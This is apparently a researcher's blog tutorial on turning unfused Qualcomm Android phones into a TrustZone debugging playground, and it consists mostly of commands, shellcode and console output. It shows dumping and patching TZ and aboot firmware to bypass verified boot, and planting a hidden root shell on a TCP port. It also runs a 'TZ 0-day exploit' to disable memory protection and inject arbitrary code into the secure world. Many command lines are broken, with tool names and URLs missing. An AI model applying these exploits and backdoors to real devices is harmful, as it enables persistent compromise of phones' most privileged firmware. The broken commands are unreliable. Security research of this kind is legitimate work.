Bring Light To The Darkness P3

16 minute read

Setting up a Qualcomm Trustzone Aarch64 Debug Playground for Android


  • TLDR:
Grab an smartphone with secure boot unfused 
Qualcomm Chipset, set it up for Trustzone 
debugging and start pwning it.
  • BTW:
This will work for both enduser devices and
development board and give us full EL0-EL3
  • Requirements :
Any unfused MSM8974,MSM8976,MSM8953,MSM8937,etc. X6, X8 
or X9 modem based Qualcomm (NOT SDM one), here 
I used a BQ X Pro and a Oneplus One smartphone for reference

python 3.x installed

1. Verifying if the device is vulnerable to cold-patching

1.1. Install latest adb and fastboot

~ $ mkdir ~/bin
~ $ cd ~/bin
~/bin $ wget; unzip; rm
~/bin $ cd ..

adb should be available after rebooting the host pc (if path is included in ~/.profile)

1.2. Install my qualcomm emergency download tools (edl)

~ $ git clone edl
~ $ cd edl
~/edl $ python3 -m pip install pyusb pyserial
~/edl $ sudo 'echo "blacklist qcserial" >> /etc/modprobe.d/blacklist.conf'
~/edl $ sudo cp Drivers/51-edl.rules /etc/udev/rules.d
~/edl $ sudo cp Drivers/50-android.rules /etc/udev/rules.d
~/edl $ sudo udevadm control -R

1.3. Grab any EDL Loader matching your device (from firmware) and put it into the “Loaders” directory

and rename it to match the displayed structure [msmid]_[pkhash 8 bytes].bin or use the provided script.

Example for directly copying BQ X Pro loader :

~/edl $ cp 000460E100000000_cc3153a80293939b_FHPRG_bqXPro.bin Loaders

Example for directly copying Oneplus One loader :

~/edl $ cp 007BC0E100000000_cc3153a80293939b_FHPRG_OnePlusOne.bin Loaders

Example using the fhloaderparse script:

~/edl $ mkdir test
~/edl $ cp emmc_prog_firehose.bin test
~/edl $ ./ test

1.4. Power off the smartphone, press volume down and volume up and

connect the usb cable. The device should enter the 9008 mode.

1.5. Verify if the device is vulnerable to cold-patching qualcomm firmware :

~/edl $ ./ -secureboot
Qualcomm Sahara / Firehose Client (c) B.Kerler 2018-2019.

__main__ - Trying with loaders in Loader directory ...
__main__ - Waiting for the device
__main__ - Device detected :)
__main__ - Mode detected: sahara
Device is in EDL mode .. continuing.
Library.sahara - 
HWID:              0x007bc0e100000000 (MSM_ID:0x007bc0e1,OEM_ID:0x0000,MODEL_ID:0x0000)
PK_HASH:           0xcc3153a80293939b90d02d3bf8b23e0292e452fef662c74998421adad42a380f
Serial:            0x0d7e015b
SBL Version:       0x00000000

Library.sahara - Unfused device detected, so any loader should be fine...
Library.sahara - Trying loader: Loaders/qualcomm/007BC0E100000000_cc3153a80293939b_FHPRG_OnePlusOne.bin
Successfully uploaded programmer :)
Library.firehose - TargetName=MSM8974
Library.firehose - MemoryName=eMMC
Library.firehose - Version=1
Library.firehose - Peek: Address(0xfc4b83f8),Size(0x4)
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Sec_Boot0 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot1 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot2 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot3 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Secure boot disabled.

If the tool says “Secure boot disabled”, it means that you can coldpatch and fully pwn the device :)

2. Getting device firmware

2.1 Dump directly from the device

Dump the stock device boot, aboot and tz partition :

~/edl $ ./ -r boot boot.img

Qualcomm Sahara / Firehose Client (c) B.Kerler 2018-2019.
__main__ - Trying with loaders in Loader directory ...
__main__ - Waiting for the device
__main__ - Device detected :)
__main__ - Mode detected: firehose
Library.firehose - TargetName=MSM8974
Library.firehose - MemoryName=eMMC
Library.firehose - Version=1
Library.firehose - 
Reading from physical partition 0, sector 196608, sectors 32768
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Dumped sector 196608 with sector count 32768 as boot.img.

if the tool says “main - USB desync, please rerun command !”, you just need to rerun the command.

~/edl $ ./ -r aboot aboot.img
~/edl $ ./ -r tz tz.img

Now we can leave the edl folder.

~/edl $ cd ..

or getting the device firmware to attack

64 Bit BQ Aquaris X Pro MSM8953
32 Bit Oneplus One MSM8974

3. Getting my qc attack framework and installing it

3.1. Grabbing the latest version of my attack tools

~ $ git clone
~ $ cd qcpatchtools

3.2. Install capstone + keystone engine:

~/qcpatchtools $ git clone --recursive
~/qcpatchtools $ cd keystone && mkdir -p build && cd build && cmake .. 
~/qcpatchtools/keystone $ ../
~/qcpatchtools/keystone $ sudo make install 
~/qcpatchtools/keystone $ cd bindings/python
~/qcpatchtools/keystone/bindings/python $ sudo python3 build install
~/qcpatchtools/keystone/bindings/python $ cd ~/qcpatchtools
~/qcpatchtools $ rm -rf keystone
~/qcpatchtools $ git clone --recursive
~/qcpatchtools $ cd capstone
~/qcpatchtools/capstone $ ./
~/qcpatchtools/capstone $ sudo ./ install
~/qcpatchtools/capstone $ cd bindings/python
~/qcpatchtools/capstone/bindings/python $ sudo python3 build install
~/qcpatchtools/capstone/bindings/python $ cd ~/qcpatchtools
~/qcpatchtools $ rm -rf capstone

3.3. Install requirements :

~/qcpatchtools $ sudo pip3 install -r requirements.txt

3.4. Now we can leave the qcpatchtools folder.

~/qcpatchtools $ cd ~

4. Modding the stock kernel

64 Bit BQ Aquaris X Pro MSM8953

4.1. Grab the latest kernel matching your device firmware version
~ $ git clone
~ $ mv aquaris-X-Pro kernel
~ $ cd kernel
~/kernel $ git checkout tags/2.5.1_20190114-1551
~/kernel $ cd ..
~ $ git clone
~ $ cd aarch64-linux-android-4.9
~/aarch64-linux-android-4.9 $ git checkout 22f053ccdfd0d73aafcceff3419a5fe3c01e878b
~/aarch64-linux-android-4.9 $ cd ..
~ $ mkdir KERNEL_OUT
4.2. Grab my fancy patch which adds custom svc handler (see Gal Beniamini’s Blog) but

also removes xpu restrictions and adds additional logging of tz svc

~ $ patch -p1 -d kernel < qcpatchtools/patches/kernel_bq_msm8953.diff
4.3. Compile the custom kernel
~ $ make -C kernel O=../KERNEL_OUT ARCH=arm64 CROSS_COMPILE=../aarch64-linux-android-4.9 bardockpro_defconfig
~ $ make -j4 O=../KERNEL_OUT/ -C kernel ARCH=arm64 CROSS_COMPILE=../aarch64-linux-android-4.9/bin/aarch64-linux-android-
~ $ cp KERNEL_OUT/arch/arm64/boot/Image.gz-dtb zkernel

32 Bit Oneplus One MSM8974

4.1. Grab the latest kernel matching your device firmware version
~ $ git clone -b cm-13.0 kernel
~ $ git clone
~ $ cd arm-linux-androideabi-4.9
~/arm-linux-androideabi-4.9 $ git checkout 10ddded24ecdbdeaa4ac57d49962ca06e9c1ceaa
~/arm-linux-androideabi-4.9 $ cd ..
~ $ mkdir KERNEL_OUT
4.2. Grab my fancy patch which adds custom svc handler (see Gal Beniamini’s Blog) but

also removes xpu restrictions and adds additional logging of tz svc

~ $ patch -p1 -d kernel < qcpatchtools/patches/kernel_oneplus_msm8974.diff
4.3. Compile the custom kernel
~ $ make -C kernel O=../KERNEL_OUT ARCH=arm CROSS_COMPILE=../arm-linux-androideabi-4.9 cyanogenmod_bacon_defconfig
~ $ make -j4 O=../KERNEL_OUT/ -C kernel ARCH=arm CROSS_COMPILE=../arm-linux-androideabi-4.9/bin/arm-linux-androideabi-
~ $ cp KERNEL_OUT/arch/arm/boot/zImage zkernel

We don’t copy the zImage-dtb over here because the oneplus uses specific dtb modded android and is already contained when extracting the boot image.

5. Rooting the stock kernel

In order to have our own rooted kernel we add our own reverse shell via adb to enable tz debugging on a locked retail BQ X smartphone using my Android_Universal and EDL Scripts

5.1. Install the android_universal toolkit

~ $ git clone

5.2. Root the stock image and add a fake root (in order to bypass

AVBv1 Root of Trust):

~ $ cd edl
~/edl $ cp boot.img ../android_universal
~/edl $ cd ~/android_universal
32 Bit Oneplus One MSM8974

The Oneplus One is signed by google test loaders, so you can flash directly the boot.img.signed file.

~/android_universal $ ./ -fn boot.img -c -fs 1
64 Bit BQ Aquaris X Pro MSM8953

As the MSM8953 devices implement Android Verified Boot v1, you will need to flash the file called “boot.img.rotfake”.

~/android_universal $ ./ -fn boot.img -c

5.3. The makeramdisk tool will halt for adding custom files to the boot image. In another shell, run :

~/android_universal $ cp ../zkernel tmp/kernel 
~/android_universal $ cd ..     

Then press enter in the makeramdisk tool to let it finish making and signing the boot image.

6. Prepare tz shellcode for code injection (either cold patch or hot patch)

6.1. Save the appropriate shellcode into a file “shellcode.txt”

32 Bit Oneplus One MSM8974
# R0 = writeflag (0=read, 0x22=write), R1=addr, R2=value, R3=readmemptr
CMP  R0, #0x22
BEQ  write
LDR  R0, [R1]
STR  R0, [R3]
B exit
STR  R2, [R1]
POP {R4-R6,PC}
64 Bit BQ Aquaris X Pro MSM8953
# X0 = writeflag (0=read, 0x22=write), R1=addr, R2=value
STP X28, X27, [SP,#-0x60]!
STP X26, X25, [SP,#0x10]
STP X24, X23, [SP,#0x20]
STP X22, X21, [SP,#0x30]
STP X20, X19, [SP,#0x40]
STP X29, X30, [SP,#0x50]
# Value of arg0 0x22 means write dword from arg2 to address arg1, 
# Value of arg0 0x0  means read dword from arg2
CMP  W0, #0x22 
BEQ  write
LDR  W0, [X1]
B exit
STR  W2, [X1]
LDP X29, X30, [SP,#0x50]
LDP X20, X19, [SP,#0x40]
LDP X22, X21, [SP,#0x30]
LDP X24, X23, [SP,#0x20]
LDP X26, X25, [SP,#0x10]
LDP X28, X27, [SP],#0x60

7. Patching tz to allow code injection by injecting our shellcode

7.1. Coldpatching the tz with our own shellcode into a codecave

~ $ cd qcpatchtools
32 Bit Oneplus One MSM8974
~/qcpatchtools $ ../ -in tz.mbn -out tz.patched -sc shellcode.txt 
      Found svc_entry_offset: 0xfe826104.
      Possible code cave at 0xfe809c8d, file offset: 0x30b8c
      svc code: 0x0C06 (svc 0x03 cmd 0x06)
      Code to patch:70b5222802d00868106000e00a6070bd
      Patching done, saved as tz.patched
64 Bit BQ Aquaris X Pro MSM8953
~/qcpatchtools $ ./ -in ../edl/tz.img -out tz.img.patched -sc shellcode.txt
     Found code cave at 0x8657871c, file offset: 0x5c71c, svc code: 0x0200020D
     Code to patch:1f88007160000054200040b9c0035fd6220000b9c0035fd6
     Patching done, saved as tz.img.patched

7.2. Sign the tz.bin using own generated private key

~/qcpatchtools $ ./ -t qsee -in tz.img.patched -out tz.signed

8. Patching aboot to allow custom ramdisk (only needed for devices with AVB, skip this step for OnePlus MSM8974)

8.1. Patching aboot

32 Bit Oneplus One MSM8974
  • Not needed
64 Bit BQ Aquaris X Pro MSM8953

Coldpatch aboot to bypass root of trust

~/qcpatchtools $ ./ -in ../edl/aboot.img -out aboot.patched

Sign the tz.bin

~/qcpatchtools $ ./ -in aboot.bin -out aboot.signed -t appsbl
~/qcpatchtools $ rm aboot.patched

9. Flashing modded files

32 Bit Oneplus One MSM8974

9.1. Copy patched boot and tz to the EDL directory
~/qcpatchtools $ cp tz.signed ../edl/ && cd ..
~/qcpatchtools $ cd ..
~ $ cp android_universal/boot.img.signed edl/
9.2. Power off the smartphone (reboot keeping

volume down + power pressed), press volume down and volume up and connect the usb cable. The device should enter the 9008 mode.

~ $ cd edl/
~/edl $ ./ -w boot boot.img.signed
~/edl $ ./python3 -w tz tz.signed

Reboot the device, it should be rooted

9.3. Reboot the device, it should be rooted

64 Bit BQ Aquaris X Pro MSM8953

9.1. Copy patched boot, tz and aboot to the EDL directory
~/edl $ cd ~
~ $ cp qcpatchtools/aboot.signed qcpatchtools/tz.signed ../edl/
~ $ cp android_universal/boot.rotfake edl/
~ $ cd /edl
9.2. Power off the smartphone (reboot keeping

volume down + power pressed), press volume down and volume up and connect the usb cable. The device should enter the 9008 mode.

~/edl $ ./ -w boot boot.rotfake
~/edl $ ./ -w aboot aboot.signed
~/edl $ ./ -w tz tz.signed
~/edl $ cd ..
9.3. If the device reboots and enters usb pid 0x900E or 0x9006,

open up the device, remove the battery connector and usb cable, short emmc clk pin to ground, connect usb cable, remove the short, and connect the battery connector. The device should then enter back to EDL usb pid 0x9008 and can then be flashed using

9.4. Reboot the device, it should be rooted

10. Testing if device is rooted :D

10.1. TZ failure unbricking process:

In case the device reboots all the time into 0x9006 mode:
~/edl $ ./ -vid 0x05c6 -pid 0x9006

The device will then be available as partition. In order to enable edl to flash back a working tz, we backup and erase sbl1 :

~/edl $ dd if=/dev/disk/by-part-label/sbl1 of=sbl1.bin
~/edl $ dd if=/dev/zero of=/dev/disk/by-part-label/sbl1

and then in edl mode (0x9008), we write back a working sbl1 and working tz:

~/edl $ ./ -w sbl1 sbl1.img
~/edl $ ./ -w tz tz.img

Copy the custom adb key (any other will be refused):

~ $ cd ../android_universal
~/android_universal $ ./
In case the device reboots all the time into 0x900E mode:

If the device doesn’t boot (red light) and enters usb pid 0x900E mode, it means the signature was invalid. You will then need to short DAT0 with GND on boot of the mobile (without battery) to enter 0x9008 mode. Then connect the battery again to reflash the firmware using edl.

~/edl $ ./ -w tz tz.img

10.2. Copy the custom adb key (any other will be refused):

~ $ cd ../android_universal
~/android_universal $ ./

10.3. To get a root shell, you need to connect to the hidden

root shell via tcp port 1231 on the device. You won’t see a prompt, so just enter your command and press enter.

$ adb shell
bardock-pro:/ $ toybox nc 1231
root@bardock:/ # id
      uid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0
root@bardock:/ # uname -a
      Linux localhost 3.18.71-perf-g18b9c9b33ae-dirty #1 SMP PREEMPT Tue Feb 26 14:18:30 CET 2019 aarch64
root@bardock:/ # getprop | grep 8.1
      [net.tcp.buffersize.lte]: [2097152,4194304,8388608,262144,524288,1048576]
      [net.tcp.buffersize.wifi]: [524288,2097152,4194304,262144,524288,1048576]
      [ril.ecclist]: [911,112,*911,#911,000,08,110,999,118,119,122]
      [ril.ecclist1]: [911,112,*911,#911,000,08,110,999,118,119]
      []: [bq/bardock-pro/bardock-pro:8.1.0/OPM1.171019.026/1492:user/release-keys]
      [ro.boottime.adbd]: [5047811195]
      [ro.boottime.cnd]: [6851364840]
      [ro.boottime.cnss-daemon]: [6891754944]
      [ro.boottime.keystore]: [6871139580]
      [ro.boottime.mediadrm]: [6872873851]
      [ro.boottime.nfc_hal_service]: [4955175831]
      [ro.boottime.nvtool]: [6861805830]
      [ro.boottime.nxpnfc_hal_svc]: [4962930831]
      []: [6887123642]
      [ro.boottime.storaged]: [6882149788]
      [ro.boottime.time_daemon]: [6853684111]
      [ro.boottime.tombstoned]: [6930821819]
      [ro.boottime.vndservicemanager]: [4090654841]
      []: [bardockpro_bq-user 8.1.0 OPM1.171019.026 1492 release-keys]
      []: [bq/bardock-pro/bardock-pro:8.1.0/OPM1.171019.026/1492:user/release-keys]
      []: [bq/bardock-pro/bardock-pro:8.1.0/OPM1.171019.026/1422:user/release-keys]
      []: [8.1.0]
      []: [8.1_201810]

11. Talk to the tz (reading tz memory)

32 Bit Oneplus One MSM8974

Read memory dword from within the tz (Address: 0xFE82CDA0)

$ adb forward tcp:1231 tcp:1231
$ adb push qcxploit /data/local/tmp
$ nc localhost 1231
root@bacon:/ # cd /data/local/tmp
root@bacon:/data/local/tmp # ./qcxploit exploit8974
root@bacon:/data/local/tmp # ./qcxploit readmem 0xFE82CDA0 4

64 Bit BQ Aquaris X Pro MSM8953

Read memory dword from within the tz (Address: 0x8657871c)

$ adb forward tcp:1231 tcp:1231
$ adb push qcxploit /data/local/tmp
$ nc localhost 1231
root@bardock:/ # cd /data/local/tmp
root@bardock:/data/local/tmp # ./qcxploit readmem 8657871c 4
  Sending SVC: 0x200020d

12. Hot patch tz (writing to code cave)

32 Bit Oneplus One MSM8974

12.1. Disabling XPU
root@bacon:/ # /data/local/tmp/qcxploit svcreg32 03 06 03 0x22 0xFC48B080 0x0
      Sending SVC: 0x10, CMD: 0x2
      IOCTL RES: 0x0000001E

root@bacon:/ # /data/local/tmp/qcxploit exploit8974
      MSM8974 TZ 0-day exploit by B.Kerler 2017
      Disable NS Blacklist
      Zeroing out IMEM
      Refreshing NS Blacklist
      Done exploiting
12.2. Reading / Writing

Reading dword

root@bacon:/ # /data/local/tmp/qcxploit svcreg32 03 06 03 0x0 0x[addr_to_read] 0x[bufferaddr]

Writing dword

root@bacon:/ # /data/local/tmp/qcxploit svcreg32 03 06 03 0x22 0x[addr_to_write] 0x[value_to_write]

Reading after xpu disabled

root@bacon:/ # /data/local/tmp/qcxploit readmem [addr_to_read] [length_to_read]

Writing after xpu disabled

root@bacon:/ # /data/local/tmp/qcxploit writemem [addr_to_write] [value_to_write_as_hexstring]
12.3. Generating shellcode
~/qcpatchtools ~ Tools/ -asm arm,thumb -in ShellCode/shellcode_examples/read_write_shellcode_arm.txt 
      CPU: arm, MODE: thumb
12.4. Injecting shellcode (0xfe809c8d is your code cave offset from 7.1.)
root@bacon:/data/local/tmp # ./qcxploit writemem FE809C8D 70b5222802d00868106000e00a6070bd
12.5. Running injected shellcode :
root@bacon:/data/local/tmp # ./qcxploit svcreg32 06 03 03 0 0xFE808796 0xFE82830c
          Sending SVC: 0xc, CMD: 0xe
          IOCTL RES: 0x0000003E
root@bacon:/data/local/tmp # ./qcxploit readmem 0xFE82830C 4
          Memory read:
12.6. For faults, see /d/tzdbg/log

64 Bit BQ Aquaris X Pro MSM8953

12.1. Disabling XPU

Disable HWIO_BIMC_S_DDR0_XPU_SCR_ADDR (optional, however disables tz key)

root@bardock:/ # ./qcxploit svcreg 200020D 4 22 44a000 13f 0


root@bardock:/ # ./qcxploit svcreg 200020D 4 22 44a080 19e 0

Disable HWIO_OCIMEM_MPU_XPU_SCR_ADDR (optional, however disables tz key)

root@bardock:/ # ./qcxploit svcreg 200020D 4 22 53000 13f 0


root@bardock:/ # ./qcxploit svcreg 200020D 4 22 53080 11f 0

Disable write protection by changing the memory area to be protected not to point to the start of tz code area, but instead to point to the end of tz code area (writing the end addr 0x866f0000 to HWIO_BIMC_S_DDR0_XPU_PRT2_START0_ADDR) <– tz bug

root@bardock:/ # ./qcxploit svcreg 200020D 4 22 44a340 866f0000 0
12.2. Enable debug logs from tz
root@bardock:/ # mount -t debugfs debugfs /d/
root@bardock:/ # ls /d/tzdbg
12.3. We can now upload any code using devmem directly to the tz

(here: write code to tz for svc cmd 0x200030F)

root@bardock:/ # ./busybox devmem 0x865ef918
root@bardock:/ # ./busybox devmem 0x865ef918 32 0x865630fc
root@bardock:/ # ./busybox devmem 0x865ef918 32 0x86572214
root@bardock:/ # ./busybox devmem 0x8657221C 32 0xD2800000
root@bardock:/ # ./qcxploit svcreg 200030F 4 0 53000 13e 0
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